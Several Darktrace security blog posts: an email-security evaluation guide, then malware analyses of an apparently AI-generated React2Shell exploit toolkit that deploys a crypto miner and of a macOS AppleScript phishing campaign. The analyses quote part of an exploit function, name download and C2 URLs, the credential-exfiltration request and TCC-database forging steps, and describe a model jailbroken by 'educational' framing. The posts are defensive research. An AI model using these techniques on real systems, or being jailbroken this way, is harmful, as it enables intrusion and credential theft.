Evaluating Email Security: How to Select the Best Solution for Your Organization
In today’s saturated market for email security, it can be difficult to cut through the noise of AI hype and vendor claims. CISOs should use a structured evaluation framework to support informed, objective comparisons of different vendors and to make the best decision for their organization.
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Written by
Carlos Gray
Senior Product Marketing Manager, Email
21 May 2025
When evaluating email security solutions, it’s crucial to move beyond marketing claims and focus on real-world performance. One of the most effective ways to achieve this is through an A/B comparison approach – a side-by-side evaluation of vendors based on consistent, predefined criteria.
This method cuts through biases, reveals true capability differences, and ensures that all solutions are assessed on a level playing field. It’s not just about finding an objectively good solution – it’s about finding the best solution for your organization’s specific needs.
An A/B comparison approach is particularly effective for three main reasons:
Eliminates bias: By comparing solutions under identical conditions, it’s easier to spot differences in performance without the fog of marketing jargon.
Highlights real capabilities: Direct side-by-side testing exposes genuine strengths and weaknesses, making it easier to judge which features are impactful versus merely decorative.
Encourages objective decision-making: This structured method reduces emotional or brand-driven decisions, focusing purely on metrics and performance.
Let’s look at the key factors to consider when setting up your evaluation to ensure a fair, accurate, and actionable comparison.
Deployment: Setting the stage for fair evaluation
To achieve a genuine comparison, deployment must be consistent across all evaluated solutions:
Establish the same scope: All solutions should be granted identical visibility across relevant tenants and domains to ensure parity.
Set a concrete timeline: Deploy and test each solution with the same dataset, at the same points in time. This allows you to observe differences in learning periods and adaptive capabilities.
Equal visibility and synchronized timelines prevent discrepancies that could skew your understanding of each vendor’s true capabilities. But remember – quicker results might not equal better learning or understanding!
Tuning and configurations: Optimizing for real-world conditions
Properly tuning and configuring each solution is critical for fair evaluation:
Compare on optimal performance: Consult with each vendor to understand what optimal deployment looks like for their solution, particularly if machine learning is involved.
Consider the long term: Configuration adjustments should be made with long-term usage in mind. Short-term fixes can mask long-term challenges.
Data visibility: Ensure each solution can retain and provide search capabilities on all data collected throughout the evaluation period.
These steps guarantee that you are comparing fully optimized versions of each platform, not underperforming or misconfigured ones.
Evaluation: Applying consistent metrics
Once deployment and configurations are aligned, the evaluation itself must be consistent, to prevent unfair scoring and help to identify true differences in threat detection and response capabilities.
Coordinate your decision criteria: Ensure all vendors are measured against the same set of criteria, established before testing begins.
Understand vendor threat classification: Each vendor may have different ways of classifying threats, so be sure to understand these nuances.
Maintain communication: If results seem inaccurate, engage with the vendors. Their response and remediation capabilities are part of the evaluation.
Making a decision: Look beyond the metrics
When it comes to reviewing the performance of each solution, it’s important to both consider and look beyond the raw data. This is about choosing the solution that best aligns with your specific business needs, which may include factors and features not captured in the results.
Evaluate based on results: Consider accuracy, threats detected, precision, and response effectiveness.
Evaluate beyond results: Assess the overall experience, including support, integrations, training, and long-term alignment with your security strategy.
Review and communicate: Internally review the findings and communicate them back to the vendors.
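As a rough illustration of the "evaluate based on results" step, the sketch below computes precision, recall, and accuracy for each vendor from the same labeled set of emails. The class name, field names, and sample counts are hypothetical and are not drawn from any real evaluation; they only show how identical criteria can be applied to every vendor.

```python
from dataclasses import dataclass


@dataclass
class VendorResults:
    """Confusion-matrix counts for one vendor over the shared evaluation dataset."""
    name: str
    true_positives: int   # malicious emails correctly flagged
    false_positives: int  # benign emails wrongly flagged
    false_negatives: int  # malicious emails missed
    true_negatives: int   # benign emails correctly delivered

    def precision(self) -> float:
        flagged = self.true_positives + self.false_positives
        return self.true_positives / flagged if flagged else 0.0

    def recall(self) -> float:
        malicious = self.true_positives + self.false_negatives
        return self.true_positives / malicious if malicious else 0.0

    def accuracy(self) -> float:
        total = (self.true_positives + self.false_positives
                 + self.false_negatives + self.true_negatives)
        correct = self.true_positives + self.true_negatives
        return correct / total if total else 0.0


def compare(vendors):
    """Return (name, precision, recall, accuracy) rows sorted by recall, best first."""
    rows = [(v.name, v.precision(), v.recall(), v.accuracy()) for v in vendors]
    return sorted(rows, key=lambda row: row[2], reverse=True)


# Illustrative counts only; not measurements of any real product.
vendor_a = VendorResults("Vendor A", 90, 10, 10, 890)
vendor_b = VendorResults("Vendor B", 80, 0, 20, 900)

for name, precision, recall, accuracy in compare([vendor_a, vendor_b]):
    print(f"{name}: precision={precision:.2f} recall={recall:.2f} accuracy={accuracy:.2f}")
```

In this made-up example both vendors have the same accuracy but trade precision against recall differently, which is why a single headline number is rarely enough to separate solutions.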
Choosing the right email security solution isn’t just about ticking boxes; it’s about strategic alignment with your organization’s goals and the evolving threat landscape. A structured, A/B comparison approach will help ensure that the solution you select is truly the best fit.
For a full checklist of the features and capabilities to compare, as well as how to perform a commercial and technical evaluation, check out the full Buyer’s Checklist for Evaluating Email Security.
AI/LLM-Generated Malware Used to Exploit React2Shell
Introduction
To observe adversary behavior in real time, Darktrace operates a global honeypot network known as “CloudyPots”, designed to capture malicious activity across a wide range of services, protocols, and cloud platforms. These honeypots provide valuable insights into the techniques, tools, and malware actively targeting internet‑facing infrastructure.
A recently observed intrusion against Darktrace’s CloudyPots environment revealed a fully AI‑generated malware sample exploiting CVE-2025-55182, also known as React2Shell. As AI‑assisted software development (“vibecoding”) becomes more widespread, attackers are increasingly leveraging large language models to rapidly produce functional tooling. This incident illustrates a broader shift: AI is now enabling even low-skill operators to generate effective exploitation frameworks at speed. This blog examines the attack chain, analyzes the AI-generated payload, and outlines what this evolution means for defenders.
Initial access
The intrusion was observed against the Darktrace Docker honeypot, which intentionally exposes the Docker daemon internet-facing with no authentication. This configuration allows any attacker to discover the daemon and create a container via the Docker API.
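For defenders who want to confirm that their own hosts do not match this honeypot configuration, the sketch below inspects the contents of a Docker daemon.json file for TCP listeners that are not protected by TLS client verification. It is a minimal check under stated assumptions: it only reads the "hosts" and "tlsverify" keys, it does not see listeners set through dockerd command-line flags, and the function name is hypothetical.

```python
import json


def exposed_tcp_hosts(daemon_json_text: str) -> list:
    """Return non-loopback tcp:// listeners configured without TLS verification."""
    config = json.loads(daemon_json_text)
    tls_verified = bool(config.get("tlsverify", False))
    exposed = []
    for host in config.get("hosts", []):
        if not host.startswith("tcp://"):
            continue  # unix sockets and other transports are out of scope here
        address = host[len("tcp://"):]
        if address.startswith(("127.", "localhost")):
            continue  # loopback-only listeners are not reachable from the internet
        if not tls_verified:
            exposed.append(host)
    return exposed


sample = '{"hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]}'
print(exposed_tcp_hosts(sample))
```

An empty result does not prove the daemon is safe; it only means this particular file does not declare an unauthenticated TCP listener.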
The attacker was observed spawning a container named “python-metrics-collector”, configured with a startup command that first installed prerequisite tools including curl, wget, and Python 3.
Figure 1: Container spawned with the name ‘python-metrics-collector’.
Subsequently, it downloads a list of required Python packages from:
hxxps://pastebin[.]com/raw/Cce6tjHM
Finally, it downloads and runs a Python script from:
hxxps://smplu[.]link/dockerzero
This link redirects to a GitHub Gist hosted by the user “hackedyoulol”, who had been banned from GitHub at the time of writing.
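The indicators in this blog are written in defanged form (hxxps, [.]) so that they cannot be clicked by accident. When loading them into a blocklist or a SIEM query, they usually need to be converted back. The helpers below are a small sketch of that conversion; the function names are hypothetical, and defang assumes the input contains a scheme followed by "://".

```python
def refang(indicator: str) -> str:
    """Convert a defanged indicator back into its usable form."""
    return indicator.replace("hxxp", "http").replace("[.]", ".")


def defang(url: str) -> str:
    """Defang the scheme and host of a URL, leaving the path untouched."""
    scheme, separator, rest = url.partition("://")
    host, slash, path = rest.partition("/")
    return scheme.replace("http", "hxxp") + separator + host.replace(".", "[.]") + slash + path


# example.com is a reserved documentation domain, used here instead of a live indicator
print(defang("https://example.com/raw/file.txt"))
print(refang("hxxps://example[.]com/raw/file.txt"))
```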
Notably, the script did not contain a Docker spreader, which is unusual for Docker-focused malware, indicating that propagation was likely handled separately from a centralized spreader server.
Deployed components and execution chain
The downloaded Python payload was the central execution component of the intrusion. The sample appears to keep a deliberate separation between the exploitation script and any spreading mechanism. Given that Docker malware samples typically include their own spreader logic, the omission suggests that the attacker maintained and executed a dedicated spreading tool remotely.
The script begins with a multi-line comment:
"""
Network Scanner with Exploitation Framework
Educational/Research Purpose Only
Docker-compatible: No external dependencies except requests
"""
This is very telling: the overwhelming majority of samples analysed do not feature this level of commentary, as they are often designed to be intentionally difficult to understand in order to hinder analysis. Quick scripts written by human operators generally prioritize speed and functionality over clarity. LLMs, on the other hand, tend to document code very thoroughly with comments, a pattern repeated throughout the sample. Further, AI models will typically refuse to generate malware as part of their safeguards.
The presence of the phrase “Educational/Research Purpose Only” additionally suggests that the attacker likely jailbroke an AI model by framing the malicious request as educational.
When portions of the script were tested in AI‑detection software, the output further indicated that the code was likely generated by a large language model.
Figure 2: GPTZero AI-detection results indicating that the script was likely generated using an AI model.
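The observation about heavy commenting can be turned into a crude triage signal. The sketch below measures what fraction of non-blank lines in a Python source file carry a "#" comment, using the standard tokenize module. It is an assumption-laden heuristic rather than the method used in this analysis: it ignores docstrings, it raises an error on source that does not tokenize, and a high ratio on its own says nothing certain about authorship.

```python
import io
import tokenize


def comment_density(source: str) -> float:
    """Fraction of non-blank lines that contain a '#' comment token."""
    comment_lines = set()
    for token in tokenize.generate_tokens(io.StringIO(source).readline):
        if token.type == tokenize.COMMENT:
            comment_lines.add(token.start[0])  # 1-based line number of the comment
    non_blank = [line for line in source.splitlines() if line.strip()]
    return len(comment_lines) / len(non_blank) if non_blank else 0.0


example = "# set up\nx = 1\ny = 2  # second value\n\nz = 3\n"
print(comment_density(example))
```

A ratio like this is best used to rank samples for human review alongside other signals, not as a verdict.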
The script is a well-constructed React2Shell exploitation toolkit, which aims to gain remote code execution and deploy an XMRig (Monero) crypto miner. It uses an IP‑generation loop to identify potential targets and executes a crafted exploitation request containing:
A deliberately structured Next.js server component payload
A chunk designed to force an exception and reveal command output
A child process invocation to run arbitrary shell commands
def execute_rce_command(base_url, command, timeout=120):
    """
    ACTUAL EXPLOIT METHOD - Next.js React Server Component RCE
    DO NOT MODIFY THIS FUNCTION
    Returns: (success, output)
    """
    try:
        # Disable SSL warnings
        urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
        [...]
        res = requests.post(base_url, files=files, headers=headers, timeout=timeout, verify=False)
This function is initially invoked with ‘whoami’ to determine if the host is vulnerable, before using wget to download XMRig from its GitHub repository and invoking it with a configured mining pool and wallet address.
Many attackers do not realise that while Monero uses an opaque blockchain (so transactions cannot be traced and wallet balances cannot be viewed), mining pools such as supportxmr will publish statistics for each wallet address that are publicly available. This makes it trivial to track the success of the campaign and the earnings of the attacker.
Figure 3: The supportxmr mining pool overview for the attacker’s wallet address.
Based on this information, we can determine that the attacker has made approximately 0.015 XMR in total since the beginning of this campaign, which at the time of writing is valued at £5. Per day, the attacker is generating 0.004 XMR, worth £1.33 at the time of writing. The worker count is 91, meaning that 91 hosts have been infected by this sample.
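The figures above can be cross-checked with a few lines of arithmetic. The sketch below derives the exchange rate implied by the reported totals, confirms the daily value, and estimates the per-host return. The "days at current rate" figure assumes the daily rate was constant for the whole campaign, which is an assumption and not something the pool statistics confirm.

```python
total_xmr = 0.015   # total mined, as reported above
total_gbp = 5.00    # reported value of that total
daily_xmr = 0.004   # reported daily rate
workers = 91        # reported worker count

implied_rate = total_gbp / total_xmr          # GBP per XMR implied by the totals
daily_gbp = daily_xmr * implied_rate          # value of one day of mining
per_host_daily_gbp = daily_gbp / workers      # average daily return per infected host
days_at_current_rate = total_xmr / daily_xmr  # assumes a constant daily rate

print(f"Implied rate: £{implied_rate:.2f} per XMR")
print(f"Daily value: £{daily_gbp:.2f}")
print(f"Per host per day: £{per_host_daily_gbp:.4f}")
print(f"Days at current rate: {days_at_current_rate:.2f}")
```

On these numbers each compromised host earns the attacker roughly a penny and a half per day, which underlines how low the return is relative to the number of victims.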
Conclusion
While the amount of money generated by the attacker in this case is relatively low, and cryptomining is far from a new technique, this campaign is proof that LLMs have made cybercrime more accessible than ever. A single prompting session with a model was sufficient for this attacker to generate a functioning exploit framework and compromise more than ninety hosts, demonstrating that the operational value of AI for adversaries should not be underestimated.
CISOs and SOC leaders should treat this event as a preview of the near future. Threat actors can now generate custom malware on demand, modify exploits instantly, and automate every stage of compromise. Defenders must prioritize rapid patching, continuous attack surface monitoring, and behavioral detection approaches. AI‑generated malware is no longer theoretical — it is operational, scalable, and accessible to anyone.
Analyst commentary
It is worth noting that the downloaded script does not appear to include a Docker spreader, meaning the malware will not replicate to other victims from an infected host. This is uncommon for Docker malware, based on other samples analyzed by Darktrace researchers. This indicates that there is a separate script responsible for spreading, likely deployed by the attacker from a central spreader server. This theory is supported by the fact that the IP that initiated the connection, 49[.]36.33.11, is registered to a residential ISP in India. While it is possible the attacker is using a residential proxy server to cover their tracks, it is also plausible that they are running the spreading script from their home computer. However, this should not be taken as confirmed attribution.
Credit to Nathaniel Bill (Malware Research Engineer) and Nathaniel Jones (VP Threat Research | Field CISO AI Security)
AppleScript Abuse: Unpacking a macOS Phishing Campaign
Introduction
Darktrace security researchers have identified a multistage malware campaign targeting macOS users that leverages social engineering and attempted abuse of the macOS Transparency, Consent and Control (TCC) privacy feature.
The malware establishes persistence via LaunchAgents and deploys a modular Node.js loader capable of executing binaries delivered from a remote command-and-control (C2) server.
Because of strengthened built-in security mechanisms in macOS, such as System Integrity Protection (SIP) and Gatekeeper, threat actors increasingly rely on alternative techniques, including fake software and ClickFix attacks [1] [2]. As a result, macOS threats rely more heavily on social engineering than on vulnerability exploitation to deliver payloads, a trend Darktrace has observed across the threat landscape [3].
Technical analysis
The infection chain starts with a phishing email that prompts the user to download an AppleScript file named “Confirmation_Token_Vesting.docx.scpt”, which attempts to masquerade as a legitimate Microsoft document.
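The double extension in this filename is a simple pattern that mail or endpoint tooling can look for. The sketch below flags attachment names where a document-style extension is immediately followed by a script extension. The extension lists and the function name are illustrative assumptions, not an exhaustive or official list.

```python
from pathlib import PurePosixPath

# Illustrative lists only; real deployments would tune these.
DOCUMENT_EXTENSIONS = {".doc", ".docx", ".pdf", ".xls", ".xlsx", ".ppt", ".pptx"}
SCRIPT_EXTENSIONS = {".scpt", ".applescript", ".command", ".sh", ".js"}


def is_masquerading_script(filename: str) -> bool:
    """True when a script extension directly follows a document extension."""
    suffixes = [suffix.lower() for suffix in PurePosixPath(filename).suffixes]
    if len(suffixes) < 2:
        return False
    return suffixes[-1] in SCRIPT_EXTENSIONS and suffixes[-2] in DOCUMENT_EXTENSIONS


print(is_masquerading_script("Confirmation_Token_Vesting.docx.scpt"))
```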
Figure 1: The AppleScript header prompting execution of the script.
Once the user opens the AppleScript file, they are presented with a prompt instructing them to run the script, supposedly due to “compatibility issues”. This prompt is necessary because AppleScript requires user interaction to execute the script, preventing it from running automatically. To further conceal its intent, the malicious part of the script is buried below many empty lines, on the assumption that a user is unlikely to scroll to the end of the file where the malicious code is placed.
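Padding a script with empty lines is easy to spot programmatically. The sketch below finds the longest run of blank lines in a text file and reports the line on which content resumes. The threshold of 50 lines is an arbitrary assumption chosen for illustration, and the function names are hypothetical.

```python
def longest_blank_run(script_text: str):
    """Return (length of the longest blank run, line number where content resumes)."""
    longest, current, resume_line = 0, 0, None
    for number, line in enumerate(script_text.splitlines(), start=1):
        if line.strip():
            if current > longest:
                longest, resume_line = current, number
            current = 0
        else:
            current += 1
    return longest, resume_line


def looks_padded(script_text: str, threshold: int = 50) -> bool:
    """Flag scripts whose content is separated by an unusually long blank gap."""
    longest, _ = longest_blank_run(script_text)
    return longest >= threshold


sample = "header line\n" + "\n" * 100 + "hidden content\n"
print(longest_blank_run(sample), looks_padded(sample))
```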
Figure 2: Curl request to receive the next stage.
This part of the script builds a silent curl request to “sevrrhst[.]com”, sending the user’s macOS operating system, CPU type and language. This request retrieves another script, which is saved as a hidden file at ~/.ex.scpt, executed, and then deleted.
The retrieved payload is another AppleScript designed to steal credentials and retrieve additional payloads. It begins by loading the AppKit framework, which enables the script to create a fake dialog box prompting the user to enter their system username and password [4].
Figure 3: Fake dialog prompt for system password.
The script then validates the username and password using the command "dscl /Search -authonly <username> <password>", all while displaying a fake progress bar to the user. If validation fails, the dialog window shakes suggesting an incorrect password and prompting the user to try again. The username and password are then encoded in Base64 and sent to: https://sevrrhst[.]com/css/controller.php?req=contact&ac=<user>&qd=<pass>.
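When reviewing proxy or DNS logs for this activity, it can help to decode what was actually sent. The sketch below extracts the ac and qd query parameters from a logged request and Base64-decodes them. It assumes both parameters carry standard Base64 values as described above; the host c2.example and the sample values are placeholders, and the function name is hypothetical.

```python
import base64
from urllib.parse import parse_qs


def decode_exfil_parameters(url: str) -> dict:
    """Base64-decode the 'ac' and 'qd' query parameters of a logged URL."""
    # Split on '?' by hand so that defanged hosts such as name[.]com do not upset URL parsing.
    query = parse_qs(url.partition("?")[2])
    decoded = {}
    for key in ("ac", "qd"):
        values = query.get(key)
        if not values:
            continue
        raw = values[0].replace(" ", "+")  # '+' is read as a space in query strings
        raw += "=" * (-len(raw) % 4)       # restore padding stripped in transit
        decoded[key] = base64.b64decode(raw).decode("utf-8", errors="replace")
    return decoded


logged = "https://c2.example/css/controller.php?req=contact&ac=YWxpY2U=&qd=aHVudGVyMg=="
print(decode_exfil_parameters(logged))
```

Decoded values are live credentials, so output from a helper like this should be handled with the same care as any other password material.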
Figure 4: Requirements gathered on trusted binary.
Within the getCSReq() function, the script chooses from trusted Mac applications: Finder, Terminal, Script Editor, osascript, and bash. Using the command codesign -d --requirements, it extracts the designated code-signing requirement from the target application. If a valid requirement cannot be retrieved, that binary is skipped. Once a designated requirement is gathered, it is then compiled into a binary trust object using the Code Signing Requirement command (csreq). This trust object is then converted into hex so it can later be injected into the TCC SQLite database.
To bypass integrity checks, the TCC directory is renamed to com.appled.TCC using Finder. TCC is a macOS privacy framework designed to restrict application access to sensitive data, requiring users to explicitly grant permissions before apps can access items such as files, contacts, and system resources [1].
Figure 5: TCC directory renamed to com.appled.TCC.
Figure 6: Example of how users interact with TCC.
After the database directory rename is attempted, the killall command is used on the tccd daemon to force macOS to release the lock on the database. The database is then injected with the forged access records, including the service, trusted binary path, auth_value, and the forged csreq binary. The directory is renamed back to com.apple.TCC, allowing the injected entries to be read and the permissions to be accepted. This enables persistent authorization for:
Full disk access
Screen recording
Accessibility
Camera
Apple Events
Input monitoring
The malware does not grant permissions to itself; instead, it forges TCC authorizations for trusted Apple-signed binaries (Terminal, osascript, Script Editor, and bash) and then executes malicious actions through these binaries to inherit their permissions.
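One way to hunt for this behavior is to review which sensitive permissions have been granted to the scripting binaries named above. The sketch below queries a copy of a TCC database for such rows. Several details are assumptions for illustration: the simplified access table built by build_demo_db, the client identifiers, the service names, and the reading of auth_value 2 as "allowed" should all be checked against the macOS version in question. Legitimate grants such as Full Disk Access for Terminal are common, so any hits are leads for review and not proof of compromise.

```python
import sqlite3

# Assumed identifiers for the binaries named above (bundle IDs or absolute paths).
WATCHED_CLIENTS = {
    "com.apple.Terminal",
    "com.apple.ScriptEditor2",
    "/usr/bin/osascript",
    "/bin/bash",
}

# Assumed TCC service names for the permissions listed above.
SENSITIVE_SERVICES = {
    "kTCCServiceSystemPolicyAllFiles",  # Full disk access
    "kTCCServiceScreenCapture",         # Screen recording
    "kTCCServiceAccessibility",         # Accessibility
    "kTCCServiceCamera",                # Camera
    "kTCCServiceAppleEvents",           # Apple Events
    "kTCCServiceListenEvent",           # Input monitoring
}

AUTH_ALLOWED = 2  # assumed meaning of auth_value on recent macOS versions


def suspicious_grants(connection):
    """Return sorted (service, client) pairs where a watched binary holds a sensitive grant."""
    query = "SELECT service, client, auth_value FROM access"
    return sorted(
        (service, client)
        for service, client, auth_value in connection.execute(query)
        if client in WATCHED_CLIENTS
        and service in SENSITIVE_SERVICES
        and auth_value == AUTH_ALLOWED
    )


def build_demo_db():
    """Build an in-memory database with a simplified, hypothetical access table."""
    connection = sqlite3.connect(":memory:")
    connection.execute(
        "CREATE TABLE access (service TEXT, client TEXT, client_type INTEGER, "
        "auth_value INTEGER, csreq BLOB)"
    )
    connection.executemany(
        "INSERT INTO access VALUES (?, ?, ?, ?, ?)",
        [
            ("kTCCServiceCamera", "/bin/bash", 1, 2, b"\x00"),
            ("kTCCServiceCamera", "com.example.videochat", 0, 2, b"\x00"),
            ("kTCCServiceScreenCapture", "/usr/bin/osascript", 1, 0, b"\x00"),
        ],
    )
    return connection


print(suspicious_grants(build_demo_db()))
```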
Although the malware attempts to manipulate TCC state via Finder, a trusted system component, Apple has introduced updates in recent macOS versions that move much of the authorization enforcement into the tccd daemon. These updates prevent unauthorized permission modifications through directory or database manipulation. As a result, the script may still succeed on some older operating systems, but it is likely to fail on newer installations, where tcc.db reloads are subject to more integrity checks. It will also fail on systems managed through Mobile Device Management (MDM), as their profiles override TCC.
Figure 7: Snippet of decoded Base64 response.
A request is made to the C2, which retrieves and executes a Base64-encoded script. This script retrieves additional payloads based on the system architecture and stores them inside a directory it creates named ~/.nodes. A series of requests are then made to sevrrhst[.]com for:
/controller.php?req=instd
/controller.php?req=tell
/controller.php?req=skip
These return a node archive, bundled Node.js binary, and a JavaScript payload. The JavaScript file, index.js, is a loader that profiles the system and sends the data to the C2. The script identifies the system platform, whether macOS, Linux or Windows, and then gathers the OS version, CPU details, memory usage, disk layout, network interfaces, and running processes. This is sent to https://sevrrhst[.]com/inc/register.php?req=init as a JSON object. The victim system is then registered with the C2 and will receive a Base64-encoded response.
Figure 8: LaunchAgent patterns to be replaced with victim information.
The Base64-encoded response decodes to an additional JavaScript file that is used to set up persistence. The script creates a folder named com.apple.commonjs in ~/Library and copies the Node dependencies into this directory. From the C2, the files package.json and default.js are retrieved and placed into the com.apple.commonjs folder. A LaunchAgent .plist is also downloaded into the LaunchAgents directory to ensure the malware automatically starts. The .plist launches node and default.js on load, and uses output logging to log errors and outputs.
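LaunchAgents that start a Node.js script at load are uncommon on most user machines, which makes them a reasonable thing to review. The sketch below parses a LaunchAgent property list with the standard plistlib module and flags entries that run a binary named node with a .js argument at load. It assumes the agent uses the ProgramArguments and RunAtLoad keys; the exact keys and paths used by this malware are not given above, so the sample values are hypothetical.

```python
import plistlib


def launches_node_script(plist_bytes: bytes) -> bool:
    """True when the agent runs a binary named 'node' with a .js argument at load."""
    plist = plistlib.loads(plist_bytes)
    if not isinstance(plist, dict):
        return False
    arguments = plist.get("ProgramArguments") or []
    if not arguments:
        return False
    program_name = str(arguments[0]).rsplit("/", 1)[-1]
    runs_node = program_name == "node"
    runs_js = any(str(argument).endswith(".js") for argument in arguments[1:])
    return bool(plist.get("RunAtLoad")) and runs_node and runs_js


# Hypothetical agent definition for demonstration; the label and path are placeholders.
sample_agent = plistlib.dumps({
    "Label": "com.example.agent",
    "ProgramArguments": ["/Users/user/Library/com.apple.commonjs/node", "default.js"],
    "RunAtLoad": True,
})
print(launches_node_script(sample_agent))
```

Developers who run Node.js services locally may have legitimate agents that match, so results should be reviewed alongside the install path and file ownership.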
Default.js is Base64-encoded JavaScript that functions as a command loop, periodically sending logs to the C2 and checking for new payloads to execute. This gives threat actors ongoing access and the ability to dynamically modify behavior without having to redeploy the malware. A further Base64-encoded JavaScript file is downloaded as addon.js.
Addon.js is used as the final payload loader, retrieving a Base64-encoded binary from https://sevrrhst[.]com/inc/register.php?req=next. The binary is decoded from Base64 and written to disk as “node_addon”, and executed silently in the background. At the time of analysis, the C2 did not return a binary, possibly because certain conditions were not met. However, this mechanism enables the delivery and execution of payloads. If the initial TCC abuse were successful, this payload could access protected resources such as Screen Capture and Camera without triggering a consent prompt, due to the previously established trust.
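The file system artifacts described in this analysis can be checked for directly. The sketch below looks under a given home directory for the paths named above: ~/.ex.scpt, ~/.nodes, and ~/Library/com.apple.commonjs. The function names are hypothetical, and because ~/.ex.scpt is deleted after execution, its absence means little. The demo function builds a temporary directory so the check can be exercised without touching a real profile.

```python
import tempfile
from pathlib import Path

# Paths relative to the user's home directory, taken from the analysis above.
IOC_RELATIVE_PATHS = (".ex.scpt", ".nodes", "Library/com.apple.commonjs")


def find_indicator_paths(home: Path) -> list:
    """Return the indicator paths that exist under the given home directory."""
    return [str(home / relative) for relative in IOC_RELATIVE_PATHS if (home / relative).exists()]


def demo() -> list:
    """Create a throwaway home directory containing one artifact and scan it."""
    with tempfile.TemporaryDirectory() as temporary_home:
        home = Path(temporary_home)
        (home / ".nodes").mkdir()
        return [Path(found).name for found in find_indicator_paths(home)]


print(demo())
```

On a real system the function would be called as find_indicator_paths(Path.home()) for each user profile being reviewed.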
Conclusion
This campaign shows how a threat actor can use an AppleScript loader to exploit user trust and manipulate TCC authorization mechanisms, achieving persistent access to a target network without exploiting vulnerabilities.
Although recent macOS versions include safeguards against this type of TCC abuse, users should keep their systems fully updated to ensure they have the most up-to-date protections. These findings also highlight the intentions of threat actors when developing malware, even when their implementation is imperfect.
Credit to Tara Gould (Malware Research Lead). Edited by Ryan Traill (Analyst Content Lead).